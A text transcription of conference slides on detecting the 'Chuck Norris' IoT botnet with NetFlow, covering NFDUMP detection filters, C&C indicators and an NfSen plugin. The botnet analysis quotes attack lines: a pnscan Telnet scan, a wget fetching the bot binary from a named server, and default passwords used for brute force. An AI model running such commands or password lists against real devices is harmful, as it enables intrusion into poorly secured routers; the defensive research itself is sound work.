Detecting Botnets with NetFlow

Similar documents
Network Security Monitoring and Behavior Analysis Pavel Čeleda, Petr Velan, Tomáš Jirsík

Revealing Botnets Using Network Traffic Statistics

Network Security Monitoring and Behavior Analysis Best Practice Document

NfSen Plugin Supporting The Virtual Network Monitoring

nfdump and NfSen 18 th Annual FIRST Conference June 25-30, 2006 Baltimore Peter Haag 2006 SWITCH

Watch your Flows with NfSen and NFDUMP 50th RIPE Meeting May 3, 2005 Stockholm Peter Haag

Automatic Network Protection Scenarios Using NetFlow

Flow-based detection of RDP brute-force attacks

Agenda. Taxonomy of Botnet Threats. Background. Summary. Background. Taxonomy. Trend Micro Inc. Presented by Tushar Ranka

Exercise 7 Network Forensics

From traditional to alternative approach to storage and analysis of flow data. Petr Velan, Martin Zadnik

FlowMon. Complete solution for network monitoring and security. INVEA-TECH

CSE 3482 Introduction to Computer Security. Denial of Service (DoS) Attacks

Network forensics 101 Network monitoring with Netflow, nfsen + nfdump

Multifaceted Approach to Understanding the Botnet Phenomenon

CS5008: Internet Computing

Network and Incident monitoring

An overview of traffic analysis using NetFlow

Nemea: Searching for Botnet Footprints

Networking for Caribbean Development

Networks and Security Lab. Network Forensics

Firewalls, IDS and IPS

Emerald. Network Collector Version 4.0. Emerald Management Suite IEA Software, Inc.

Malicious Network Traffic Analysis

Analysis of Network Beaconing Activity for Incident Response

Course Content: Session 1. Ethics & Hacking

Network Security. Chapter 3. Cornelius Diekmann. Version: October 21, Lehrstuhl für Netzarchitekturen und Netzdienste Institut für Informatik

How To Create A Network Monitoring System (Flowmon) In Avea-Tech (For Free)

UNMASKCONTENT: THE CASE STUDY

Firewall Firewall August, 2003

Denial of Service Attacks

Recommendations for Network Traffic Analysis Using the NetFlow Protocol Best Practice Document

Detecting peer-to-peer botnets

Monitoring of Tunneled IPv6 Traffic Using Packet Decapsulation and IPFIX

Plugging Network Security Holes using NetFlow. Loopholes in todays network security solutions and how NetFlow can help

Computer Security CS 426 Lecture 36. CS426 Fall 2010/Lecture 36 1

Network Monitoring and Management NetFlow Overview

Team Cymru. Network Forensics. Ryan Connolly, <

2010 Carnegie Mellon University. Malware and Malicious Traffic

Chapter 4 Managing Your Network

Security Toolsets for ISP Defense

Firewalls. Test your Firewall knowledge. Test your Firewall knowledge (cont) (March 4, 2015)

Introduction to Netflow

Firewalls. Chapter 3

Log Management with Open-Source Tools. Risto Vaarandi rvaarandi 4T Y4H00 D0T C0M

DISTRIBUTED DENIAL OF SERVICE OBSERVATIONS

Flow Based Traffic Analysis

Decoding DNS data. Using DNS traffic analysis to identify cyber security threats, server misconfigurations and software bugs

GregSowell.com. Mikrotik Security

CIT 380: Securing Computer Systems

HUNTING ATTACKERS WITH NETWORK AUDIT TRAILS

A Critical Investigation of Botnet

Internet Firewall CSIS Packet Filtering. Internet Firewall. Examples. Spring 2011 CSIS net15 1. Routers can implement packet filtering

[Optional] Network Visibility with NetFlow

AT&T Real-Time Network Security Overview

Glasnost or Tyranny? You Can Have Secure and Open Networks!

SECURING INFORMATION SYSTEMS

VULNERABILITY ASSESSMENT WHITEPAPER INTRODUCTION, IMPLEMENTATION AND TECHNOLOGY DISCUSSION

Host Discovery with nmap

Phone Fax

FIREWALLS. Firewall: isolates organization s internal net from larger Internet, allowing some packets to pass, blocking others

Log Management with Open-Source Tools. Risto Vaarandi SEB Estonia

Chapter 8 Security Pt 2

Network Monitoring Tool to Identify Malware Infected Computers

Guidance Regarding Skype and Other P2P VoIP Solutions

An Open Source IPS. IIT Network Security Project Project Team: Mike Smith, Sean Durkin, Kaebin Tan

How To Protect A Dns Authority Server From A Flood Attack

SECURING APACHE : DOS & DDOS ATTACKS - II

Firewall Server 7.2. Release Notes. What's New in Firewall Server 7.2

Port Scanning and Vulnerability Assessment. ECE4893 Internetwork Security Georgia Institute of Technology

Attacks and Defense. Phase 1: Reconnaissance

How To Mitigate A Ddos Attack

Management, Logging and Troubleshooting

How to protect your home/office network?

The HoneyNet Project Scan Of The Month Scan 27

Firewalls. Ingress Filtering. Ingress Filtering. Network Security. Firewalls. Access lists Ingress filtering. Egress filtering NAT

Revealing and Analysing Modem Malware

Tools for penetration tests 1. Carlo U. Nicola, HT FHNW With extracts from documents of : Google; Wireshark; nmap; Nessus.

About Botnet, and the influence that Botnet gives to broadband ISP

Seminar Computer Security

Network Monitoring Based on IP Data Flows

Introduction of Intrusion Detection Systems

VIRUS TRACKER CHALLENGES OF RUNNING A LARGE SCALE SINKHOLE OPERATION

7.7 DDoS : Unknown Secrets and Botnet Counter-Attack. sionics & kaientt

Network Monitoring Based on IP Data Flows Best Practice Document

The anatomy of an online banking fraud

CS2107 Introduction to Information and System Security (Slid. (Slide set 8)

Unless otherwise noted, all references to STRM refer to STRM, STRM Log Manager, and STRM Network Anomaly Detection.

Pwning Intranets with HTML5

CS 356 Lecture 16 Denial of Service. Spring 2013

Richard Bejtlich / taosecurity.blogspot.com BSDCan 14 May 04

PANDORA FMS NETWORK DEVICE MONITORING

Internet Firewall CSIS Internet Firewall. Spring 2012 CSIS net13 1. Firewalls. Stateless Packet Filtering

Flow Analysis Versus Packet Analysis. What Should You Choose?

F-Secure Internet Gatekeeper

Transcription:

Detecting Botnets with NetFlow V. Krmíček, T. Plesník {vojtec plesnik}@ics.muni.cz FloCon 2011, January 12, Salt Lake City, Utah

Presentation Outline NetFlow Monitoring at MU Chuck Norris Botnet in a Nutshell Botnet Detection Methods NfSen Botnet Detection Plugin Conclusion Krmíček, Plesník Detecting Botnets with NetFlow 2 / 28

Part I NetFlow Monitoring at MU Krmíček, Plesník Detecting Botnets with NetFlow 3 / 28

Masaryk University, Brno, Czech Republic 9 faculties: 200 departments and institutes 48 000 students and employees 15 000 networked hosts 2x 10 gigabit uplinks to CESNET Interval Flows Packets Bytes Second 5 k 150 k 132 M Minute 300 k 9 M 8 G Hour 15 M 522 M 448 G Day 285 M 9.4 G 8 T Week 1.6 G 57 G 50 T 1500000 1000000 500000 Number of Flows in MU Network (5-minute Window) Average traffic volume at the edge links in peak hours. 0 Mon Tue Wed Thu Fri Sat Sun Krmíček, Plesník Detecting Botnets with NetFlow 4 / 28

FlowMon Probes at Masaryk University Campus FlowMon probes: 25 NetFlow collectors: 6 Krmíček, Plesník Detecting Botnets with NetFlow 5 / 28

NetFlow Monitoring at Masaryk University FlowMon probe FlowMon probe FlowMon probe NetFlow data generation Krmíček, Plesník Detecting Botnets with NetFlow 6 / 28

NetFlow Monitoring at Masaryk University FlowMon probe FlowMon probe NetFlow v5/v9 NetFlow collector FlowMon probe NetFlow data generation NetFlow data collection Krmíček, Plesník Detecting Botnets with NetFlow 6 / 28

NetFlow Monitoring at Masaryk University FlowMon probe SPAM detection FlowMon probe NetFlow v5/v9 NetFlow collector worm/virus detection intrusion detection FlowMon probe NetFlow data generation NetFlow data collection NetFlow data analyses Krmíček, Plesník Detecting Botnets with NetFlow 6 / 28

NetFlow Monitoring at Masaryk University FlowMon probe FlowMon probe SPAM detection NetFlow v5/v9 worm/virus detection NetFlow collector intrusion detection FlowMon probe NetFlow data generation Krmíček, Plesník http WWW mail mailbox syslog syslog server NetFlow data collection NetFlow data analyses Detecting Botnets with NetFlow incident reporting 6 / 28

From NetFlow Monitoring to Botnet Discovery Network Behaviour Analysis at MU Identifies malware from NetFlow data. Watch what s happening inside the network 24/7. Single purpose detection patterns (scanning, botnets,...). Complex models of the network behavior. Even Chuck Norris Can t Resist NetFlow Monitoring Unusual worldwide TELNET scan attempts. Mostly comming from ADSL connections. New botnet Chuck Norris discovered at December 2009. Detailed analysis followed. Krmíček, Plesník Detecting Botnets with NetFlow 7 / 28

Part II Chuck Norris Botnet in a Nutshell Krmíček, Plesník Detecting Botnets with NetFlow 8 / 28

Chuck Norris Botnet Linux malware IRC bots with central C&C servers. Attacks poorly-configured Linux MIPSEL devices. Vulnerable devices ADSL modems and routers. Uses TELNET brute force attack for infection. Users are not aware about the malicious activities. Missing anti-malware solution to detect it. Discovered at Masaryk University on 2 December 2009. The malware got the Chuck Norris moniker from a comment in its source code [R]anger Killato : in nome di Chuck Norris! Krmíček, Plesník Detecting Botnets with NetFlow 9 / 28

Botnet Lifecycle Scanning for vulnerable devices in predefined networks IP prefixes of ADSL networks of worldwide operators network scanning # pnscan -n30 88.102.106.0/24 23 Infection of a vulnerable device TELNET dictionary attack 15 default passwords admin, password, root, 1234, dreambox, blank password IRC bot initialization IRC bot download and execution on infected device # wget http://87.98.163.86/pwn/syslgd;... Botnet C&C operations further bots spreading and C&C commands execution DNS spoofing and denial-of-service attacks Krmíček, Plesník Detecting Botnets with NetFlow 10 / 28

More about Chuck Norris Botnet Chuck Norris botnet lifecycle in details and further information are available at the CYBER project page: http://www.muni.cz/ics/cyber/chuck_norris_botnet stop remote access (ports 22-80) STOP infected device bot 1. join ##soldiers## 2. Topic:!* init-cmd (get scan-tools) C&C (IRC) server 3. wget scan-tools web server Krmíček, Plesník Detecting Botnets with NetFlow 11 / 28

Part III Botnet Detection Methods Krmíček, Plesník Detecting Botnets with NetFlow 12 / 28

Detection Methods Overview Five Detection Methods Telnet scan detection. Connections to botnet distribution sites detection. Connections to botnet C&C centers detection. DNS spoofing attack detection. ADSL string detection. Methods Correspond to Botnet Lifecycle Applied to NetFlow Data Defined as NFDUMP filters. Implemented to NfSen collector. Krmíček, Plesník Detecting Botnets with NetFlow 13 / 28

Telnet Scan Detection Phase I Incoming and outgoing TCP SYN scans on port 23. infected device NFDUMP detection filter: Krmíček, Plesník Detecting Botnets with NetFlow 14 / 28

Telnet Scan Detection Phase I Incoming and outgoing TCP SYN scans on port 23. infected device local network NFDUMP detection filter: (net local_network) Krmíček, Plesník Detecting Botnets with NetFlow 14 / 28

Telnet Scan Detection Phase I Incoming and outgoing TCP SYN scans on port 23. list of C class networks to scan infected device 147.251.20.x 147.251.18.x 147.251.3.x 147.251.4.x local network NFDUMP detection filter: (net local_network) Krmíček, Plesník Detecting Botnets with NetFlow 14 / 28

Telnet Scan Detection Phase I Incoming and outgoing TCP SYN scans on port 23. list of C class networks to scan infected device TCP/23 147.251.20.x 147.251.18.x 147.251.3.x 147.251.4.x local network NFDUMP detection filter: (net local_network) and (dst port 23) and (proto TCP) Krmíček, Plesník Detecting Botnets with NetFlow 14 / 28

Telnet Scan Detection Phase I Incoming and outgoing TCP SYN scans on port 23. list of C class networks to scan infected device TCP/23 147.251.20.x 147.251.18.x 147.251.3.x 196.142.8.x 147.251.4.x local network 214.12.83.x NFDUMP detection filter: (net local_network) and (dst port 23) and (proto TCP) Krmíček, Plesník Detecting Botnets with NetFlow 14 / 28

Telnet Scan Detection Phase I Incoming and outgoing TCP SYN scans on port 23. list of C class networks to scan infected device TCP/23 SYN/RESET flags 147.251.20.x 147.251.18.x 147.251.3.x 196.142.8.x 147.251.4.x local network 214.12.83.x NFDUMP detection filter: (net local_network) and (dst port 23) and (proto TCP) and ((flags S and not flags ARPUF) or (flags SR and not flags APUF)) Krmíček, Plesník Detecting Botnets with NetFlow 14 / 28

Connections to Botnet Distribution Sites Phase II Bot s web download requests from infected host. local network NFDUMP detection filter: 1 IP addresses of attacker s botnet distribution web servers Krmíček, Plesník Detecting Botnets with NetFlow 15 / 28

Connections to Botnet Distribution Sites Phase II Bot s web download requests from infected host. infected device local network NFDUMP detection filter: (src net local_network) 1 IP addresses of attacker s botnet distribution web servers Krmíček, Plesník Detecting Botnets with NetFlow 15 / 28

Connections to Botnet Distribution Sites Phase II Bot s web download requests from infected host. botnet distribution web server botnet distribution web server infected device local network botnet distribution web server NFDUMP detection filter: (src net local_network) and (dst ip web_servers 1 ) 1 IP addresses of attacker s botnet distribution web servers Krmíček, Plesník Detecting Botnets with NetFlow 15 / 28

Connections to Botnet Distribution Sites Phase II Bot s web download requests from infected host. botnet distribution web server botnet distribution web server TCP/80 infected device local network botnet distribution web server NFDUMP detection filter: (src net local_network) and (dst ip web_servers 1 ) and (dst port 80) and (proto TCP) 1 IP addresses of attacker s botnet distribution web servers Krmíček, Plesník Detecting Botnets with NetFlow 15 / 28

Connections to Botnet Distribution Sites Phase II Bot s web download requests from infected host. botnet distribution web server botnet distribution web server TCP/80 SYN/ACK flags infected device local network botnet distribution web server NFDUMP detection filter: (src net local_network) and (dst ip web_servers 1 ) and (dst port 80) and (proto TCP) and (flags SA and not flag R) 1 IP addresses of attacker s botnet distribution web servers Krmíček, Plesník Detecting Botnets with NetFlow 15 / 28

Connections to Botnet C&C Center Phase III Bot s IRC traffic with command and control center. local network NFDUMP detection filter: 2 IP address of an attacker s IRC server (Botnet C&C center) Krmíček, Plesník Detecting Botnets with NetFlow 16 / 28

Connections to Botnet C&C Center Phase III Bot s IRC traffic with command and control center. infected device local network NFDUMP detection filter: (src net local_network) 2 IP address of an attacker s IRC server (Botnet C&C center) Krmíček, Plesník Detecting Botnets with NetFlow 16 / 28

Connections to Botnet C&C Center Phase III Bot s IRC traffic with command and control center. botnet C&C server infected device local network NFDUMP detection filter: (src net local_network) and (dst ip IRC_server 2 ) 2 IP address of an attacker s IRC server (Botnet C&C center) Krmíček, Plesník Detecting Botnets with NetFlow 16 / 28

Connections to Botnet C&C Center Phase III Bot s IRC traffic with command and control center. botnet C&C server TCP/1200 infected device local network NFDUMP detection filter: (src net local_network) and (dst ip IRC_server 2 ) and (dst port 1200) and (proto TCP) 2 IP address of an attacker s IRC server (Botnet C&C center) Krmíček, Plesník Detecting Botnets with NetFlow 16 / 28

Connections to Botnet C&C Center Phase III Bot s IRC traffic with command and control center. botnet C&C server TCP/1200 SYN/ACK flags infected device local network NFDUMP detection filter: (src net local_network) and (dst ip IRC_server 2 ) and (dst port 1200) and (proto TCP) and (flags SA and not flag R) 2 IP address of an attacker s IRC server (Botnet C&C center) Krmíček, Plesník Detecting Botnets with NetFlow 16 / 28

DNS Spoofing Attack Detection Phase IV Attacker s DNS or OpenDNS Queries Common DNS requests forwarded to OpenDNS servers. Targeted DNS requests forwarded to attacker s spoofed DNS. DNS Queries Outside Local Network Used for Phishing Attacks local network E.g. Facebook or banking sites. NFDUMP detection filter: 3 IP addresses of a common OpenDNS servers 4 IP addresses of a spoofed attacker s DNS servers Krmíček, Plesník Detecting Botnets with NetFlow 17 / 28

DNS Spoofing Attack Detection Phase IV Attacker s DNS or OpenDNS Queries Common DNS requests forwarded to OpenDNS servers. Targeted DNS requests forwarded to attacker s spoofed DNS. DNS Queries Outside Local Network Used for Phishing Attacks E.g. Facebook or banking sites. NFDUMP detection filter: (src net local_network) infected device local network 3 IP addresses of a common OpenDNS servers 4 IP addresses of a spoofed attacker s DNS servers Krmíček, Plesník Detecting Botnets with NetFlow 17 / 28

DNS Spoofing Attack Detection Phase IV Attacker s DNS or OpenDNS Queries Common DNS requests forwarded to OpenDNS servers. Targeted DNS requests forwarded to attacker s spoofed DNS. OpenDNS server DNS Queries Outside Local Network Used for Phishing Attacks E.g. Facebook or banking sites. infected device local network NFDUMP detection filter: (src net local_network) and ((dst ip OpenDNS servers 3 ) or 3 IP addresses of a common OpenDNS servers 4 IP addresses of a spoofed attacker s DNS servers Krmíček, Plesník Detecting Botnets with NetFlow 17 / 28

DNS Spoofing Attack Detection Phase IV Attacker s DNS or OpenDNS Queries Common DNS requests forwarded to OpenDNS servers. Targeted DNS requests forwarded to attacker s spoofed DNS. spoofed DNS server OpenDNS server DNS Queries Outside Local Network Used for Phishing Attacks E.g. Facebook or banking sites. infected device local network NFDUMP detection filter: (src net local_network) and ((dst ip OpenDNS servers 3 ) or (dst ip DNS servers 4 )) 3 IP addresses of a common OpenDNS servers 4 IP addresses of a spoofed attacker s DNS servers Krmíček, Plesník Detecting Botnets with NetFlow 17 / 28

DNS Spoofing Attack Detection Phase IV Attacker s DNS or OpenDNS Queries Common DNS requests forwarded to OpenDNS servers. Targeted DNS requests forwarded to attacker s spoofed DNS. spoofed DNS server UDP/53 OpenDNS server DNS Queries Outside Local Network Used for Phishing Attacks E.g. Facebook or banking sites. infected device local network NFDUMP detection filter: (src net local_network) and ((dst ip OpenDNS servers 3 ) or (dst ip DNS servers 4 )) and (proto UDP) and (dst port 53) 3 IP addresses of a common OpenDNS servers 4 IP addresses of a spoofed attacker s DNS servers Krmíček, Plesník Detecting Botnets with NetFlow 17 / 28

ADSL String Detection Looking for ADSL String ADSL string indicates Chuck Norris botnet. Searching in victim s hostname or victim s WHOIS. Quering DNS server and parsing recieved hostname. Quering WHOIS database and parsing recieved info. adsl 196.192.5.72 Krmíček, Plesník Detecting Botnets with NetFlow 18 / 28

Detected Chuck Norris Servers Known IP Addresses Web server addresses: 87.98.173.190, 87.98.163.86 IRC server addresses: 87.98.173.190, 87.98.163.86 IRC server port: 12000 OpenDNS server addresses: 208.67.222.222, 208.67.220.220 Spoofed DNS server: 87.98.163.86 This data is used in detection methods by default. IP addresses updates are published at project page. Krmíček, Plesník Detecting Botnets with NetFlow 19 / 28

Part IV NfSen Botnet Detection Plugin Krmíček, Plesník Detecting Botnets with NetFlow 20 / 28

Botnet Detection Plugin Plugin Features Detects Chuck Norris-like botnet behavior. Based on NetFlow and other network data sources. Processes data regularly and provides real-time output. Plugin Architecture Compliant with NfSen plugins architecture recommendations. PHP frontend with a Perl backend and a PostgreSQL DB. Web, e-mail and syslog detection output and reporting. Krmíček, Plesník Detecting Botnets with NetFlow 21 / 28

Plugin Architecture BACKEND FRONTEND Krmíček, Plesník Detecting Botnets with NetFlow 22 / 28

Plugin Architecture BACKEND FRONTEND cndet.pm Krmíček, Plesník Detecting Botnets with NetFlow 22 / 28

Plugin Architecture BACKEND FRONTEND cndet.pm cndet.php Krmíček, Plesník Detecting Botnets with NetFlow 22 / 28

Plugin Architecture BACKEND FRONTEND cndet.pm cndet.php nfsend comm. interface Krmíček, Plesník Detecting Botnets with NetFlow 22 / 28

Plugin Architecture BACKEND FRONTEND cndet.pm cndet.php nfsend comm. interface cndetdb.pm Krmíček, Plesník Detecting Botnets with NetFlow 22 / 28

Plugin Architecture BACKEND FRONTEND cndet.pm cndet.php nfsend comm. interface cndetdb.pm NetFlow data DNS WHOIS db Krmíček, Plesník Detecting Botnets with NetFlow 22 / 28

Plugin Architecture BACKEND FRONTEND cndet.pm cndet.php nfsend comm. interface PostgreSQL cndetdb.pm NetFlow data DNS WHOIS db Krmíček, Plesník Detecting Botnets with NetFlow 22 / 28

Plugin Architecture BACKEND FRONTEND cndet.pm cndet.php nfsend comm. interface PostgreSQL cndetdb.pm NetFlow data DNS WHOIS db Krmíček, Plesník Detecting Botnets with NetFlow 22 / 28

Plugin Architecture BACKEND FRONTEND cndet.pm cndet.php nfsend comm. interface PostgreSQL cndetdb.pm NetFlow data DNS WHOIS db Krmíček, Plesník Detecting Botnets with NetFlow 22 / 28

Plugin Architecture BACKEND FRONTEND cndet.pm cndet.php nfsend comm. interface PostgreSQL cndetdb.pm NetFlow data DNS WHOIS db Krmíček, Plesník Detecting Botnets with NetFlow 22 / 28

Plugin Methods Architecture cndetdb.pm Krmíček, Plesník Detecting Botnets with NetFlow 23 / 28

Plugin Methods Architecture cndetdb.pm NetFlow data PostgreSQL DNS WHOIS db Krmíček, Plesník Detecting Botnets with NetFlow 23 / 28

Plugin Methods Architecture cndetdb.pm Telnet scan detection NetFlow data PostgreSQL DNS WHOIS db Krmíček, Plesník Detecting Botnets with NetFlow 23 / 28

Plugin Methods Architecture cndetdb.pm Telnet scan detection Botnet distribution sites detection NetFlow data PostgreSQL DNS WHOIS db Krmíček, Plesník Detecting Botnets with NetFlow 23 / 28

Plugin Methods Architecture cndetdb.pm Telnet scan detection Botnet distribution sites detection NetFlow data Botnet C&C centers detection PostgreSQL DNS WHOIS db Krmíček, Plesník Detecting Botnets with NetFlow 23 / 28

Plugin Methods Architecture cndetdb.pm Telnet scan detection Botnet distribution sites detection NetFlow data Botnet C&C centers detection DNS spoofing attack detection PostgreSQL DNS WHOIS db Krmíček, Plesník Detecting Botnets with NetFlow 23 / 28

Plugin Methods Architecture cndetdb.pm Telnet scan detection Botnet distribution sites detection NetFlow data Botnet C&C centers detection DNS spoofing attack detection PostgreSQL DNS ADSL string detection WHOIS db Krmíček, Plesník Detecting Botnets with NetFlow 23 / 28

Web Interface Infected Host Detected Krmíček, Plesník Detecting Botnets with NetFlow 24 / 28

Part V Conclusion Krmíček, Plesník Detecting Botnets with NetFlow 25 / 28

Detection Plugin and Other Botnets Botnet Lifecycle Similar for Majority of Botnets scanning for possible bots infection of a vulnerable devices bot initialization/update botnet operation Botnet Detection Plugin Customization modular plugin engine easy modification for detection of other botnet we need to customize detection methods plugin distributed under the BSD license Krmíček, Plesník Detecting Botnets with NetFlow 26 / 28

Conclusion Network Devices Are Not Protected Routers, access points, printers, cameras, TVs,... No AV software, missing patches and firmware updates. But they should be protected! Experience Future NetFlow can monitor all such devices in network. Discovery of new Chuck Norris botnet using NetFlow. Developed a specialized NfSen plugin for Chuck Norris botnet detection. Chuck Norris is down, but others are coming (e.g., Stuxnet). We are open to research collaboration. Detection plugin is available at our project site. Krmíček, Plesník Detecting Botnets with NetFlow 27 / 28

Thank You For Your Attention! Detecting Botnets with NetFlow Vojtěch Krmíček Tomáš Plesník vojtec plesnik@ics.muni.cz Project CYBER http://www.muni.cz/ics/cyber This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801. Krmíček, Plesník Detecting Botnets with NetFlow 28 / 28

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information